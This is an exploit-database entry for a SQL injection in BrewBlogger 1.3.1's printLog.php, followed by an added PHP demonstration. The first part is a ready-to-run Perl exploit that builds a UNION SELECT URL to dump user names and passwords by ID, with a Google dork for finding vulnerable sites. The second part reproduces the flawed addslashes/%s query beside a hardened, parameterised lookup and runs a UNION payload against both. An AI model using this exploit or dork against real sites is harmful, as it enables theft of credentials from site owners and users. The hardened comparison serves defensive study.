0day.today - Biggest Exploit Database in the World.
BrewBlogger 1.3.1 (printLog.php) Remote SQL Injection Vulnerability
```perl
#!/usr/bin/perl
###########################################################################################
#Target:
#
#	BrewBlogger 1.3.1
#
#Vulnerability:
#
#	SQL Injection
#
#Description:
#
#	BrewBlogger does not properly sanitize the 'id=' parameter passed to printLog.php.
#	Since each user entry contains an auto-incrementing ID number, it is possible to
#	enumerate all user names and passwords stored in the 'users' database by iterating
#	through every possible ID number.
#
#Vulnerable Code (truncated):
#
#	$colname_log = (get_magic_quotes_gpc()) ? $_GET['id'] : addslashes($_GET['id']);
#	$query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
#	$log = mysql_query($query_log, $brewing) or die(mysql_error());
#
#Usage:
#	This script will produce a URL which will reveal the user name and password for
#	the specified ID. If no ID is specified, 2 is used (seems to be the usual ID for
#	the first user). The user name will be listed as "Method:" under 'General
#	Information', and the password will be listed as "Cost:".
#
#Usage:
#	./brewblog.pl <domain name + path> [user id]
#
#Examples:
#
#	./brewblogger.pl www.beerblog.com 3
#	./brewblogger.pl www.mysite.com/beerblog
#
#Google Dork:
#
#	intext:"BrewBlogger for PHP"
#
#Discovery/code:
#
#	Craig Heffner
###########################################################################################

print '
###########################################
# BrewBlogger 1.3.1 SQL Injection Exploit #
#                                         #
# Discovered and coded by: Craig Heffner  #
###########################################
';

# Print usage when no target is given or help is requested
if(!$ARGV[0] || $ARGV[0] eq "-h"){
	print "\nUsage: ./brewlogger.pl <domain name + path> [user id]\n\nSee script comments for more details\n";
	exit;
}

# Default to user ID 2 when none is supplied
if(!$ARGV[1]){
	$id = 2;
} else {
	$id = $ARGV[1];
}

$url = "http://" . $ARGV[0] . "/printLog.php?id=0+UNION+SELECT+";

# Build a 210-column UNION list; columns 8 and 9 carry user_name and password
$a = 1;
while($a < 211){
	if($a == 8){
		$string .= "user_name,";
	} elsif($a == 9){
		$string .= "password,";
	} elsif($a == 210){
		$string .= "1";
	} else {
		$string .= "1,";
	}
	$a++;
}

print "\n\nUse the following URL:\n\n" . $url . $string . "+FROM+users+WHERE+id=" . $id . "\n";
exit;

# 0day.today [2024-07-02] #
```
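The vulnerable line quoted in the advisory runs `addslashes()` over `id` but then places it in the query with `%s` and no surrounding quotes, so the escaping has nothing to act on. The following added example (not part of the original advisory and not BrewBlogger's code) reproduces that construction beside a hardened lookup. Assumptions: an in-memory SQLite database stands in for MySQL, the tables are cut down to three columns instead of the 210 the advisory's URL uses, and the column names `method` and `cost` and all rows are constructed.

```php
<?php
// Added example, not BrewBlogger code. SQLite in memory stands in for MySQL;
// table layouts, column names and rows are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE brewing (id INTEGER, method TEXT, cost TEXT)");
$db->exec("CREATE TABLE users (id INTEGER, user_name TEXT, password TEXT)");
$db->exec("INSERT INTO brewing VALUES (1, 'All Grain', '25.00')");
$db->exec("INSERT INTO users VALUES (2, 'brewer', 'constructed-secret')");

// Same construction as the quoted printLog.php lines: addslashes(), then %s
// with no quotes. (get_magic_quotes_gpc() is left out; PHP 8 removed it.)
function vulnerable_lookup(PDO $db, string $id): array {
    $colname_log = addslashes($id);
    $query_log = sprintf("SELECT * FROM brewing WHERE id = %s", $colname_log);
    return $db->query($query_log)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: accept only decimal digits, then bind the value as an integer so
// the input can never become part of the SQL text.
function hardened_lookup(PDO $db, string $id): array {
    if (!ctype_digit($id)) {
        return [];  // not a plain non-negative number: reject before querying
    }
    $stmt = $db->prepare("SELECT * FROM brewing WHERE id = ?");
    $stmt->bindValue(1, (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Input of the shape the advisory's URL carries, narrowed to three columns.
$input = "0 UNION SELECT 1,user_name,password FROM users WHERE id=2";

// addslashes() escapes only ' " \ and NUL. Compare the input before and after.
echo "changed by addslashes(): ";
var_dump(addslashes($input) !== $input);

echo "vulnerable_lookup, UNION input:\n";
print_r(vulnerable_lookup($db, $input));

echo "hardened_lookup, UNION input:\n";
print_r(hardened_lookup($db, $input));

echo "hardened_lookup, id=1:\n";
print_r(hardened_lookup($db, "1"));
```

In the vulnerable path the `users` row comes back under the `brewing` column names, which matches the advisory's note that the user name and password show up in the "Method:" and "Cost:" fields.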